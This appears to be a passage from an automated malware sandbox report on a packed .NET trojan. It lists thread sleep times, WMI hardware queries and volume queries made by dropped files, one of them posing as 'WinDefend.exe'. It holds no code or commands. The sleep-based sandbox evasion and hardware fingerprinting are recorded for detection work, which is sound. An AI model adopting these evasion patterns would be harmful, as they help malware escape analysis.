Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592785s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592635s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592507s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592367s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592249s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -591922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -591789s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe TID: 7312	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7328	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7556	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7708	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7716	Thread sleep count: 9489 > 30
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7716	Thread sleep count: 346 > 30
Source: C:\Users\user\AppData\Roaming\Loaader.exe TID: 7552	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loaader.exe TID: 7692	Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7736	Thread sleep count: 8122 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7736	Thread sleep count: 1610 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -598906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -598797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -199062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -198624s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98978s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98830s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99887s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99521s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -97828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -97670s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -97551s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -97316s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99746s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99079s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99936s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99742s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99561s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99319s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99180s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99060s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98804s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -591993s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99876s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99758s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768	Thread sleep count: 9626 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212	Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768	Thread sleep count: 43 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252	Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7504	Thread sleep count: 9073 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599877s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599738s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599612s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599476s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7504	Thread sleep count: 641 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599217s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -598982s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -598845s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -598704s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99871s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99755s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99633s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99401s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99285s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99168s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99053s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98815s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99815s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99684s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99564s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99435s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99314s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98958s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98822s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98706s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98573s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98459s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99960s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99852s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99591s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99351s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99236s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99105s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98872s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99901s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99753s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99615s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680	Thread sleep count: 9149 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep count: 575 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4276	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep count: 8305 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 606 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5536	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Client.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599524	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598826	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598556	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598433	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598323	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598090	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597745	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597320	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596948	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596604	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596270	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595684	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99866	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99745	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99628	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99389	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99280	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99171	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99793	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99647	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99210	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 593075	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592785	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592635	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592507	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592367	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592249	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591789	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99766
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99641
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99531
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99422
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99312
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99201
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99094
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98978
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98830
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98672
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99887
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99781
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99521
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99406
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99297
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 97828
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 97670
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 97551
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 97316
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99859
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99746
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99640
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99421
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99203
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99079
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98750
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99936
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99742
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99561
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99319
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99180
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99060
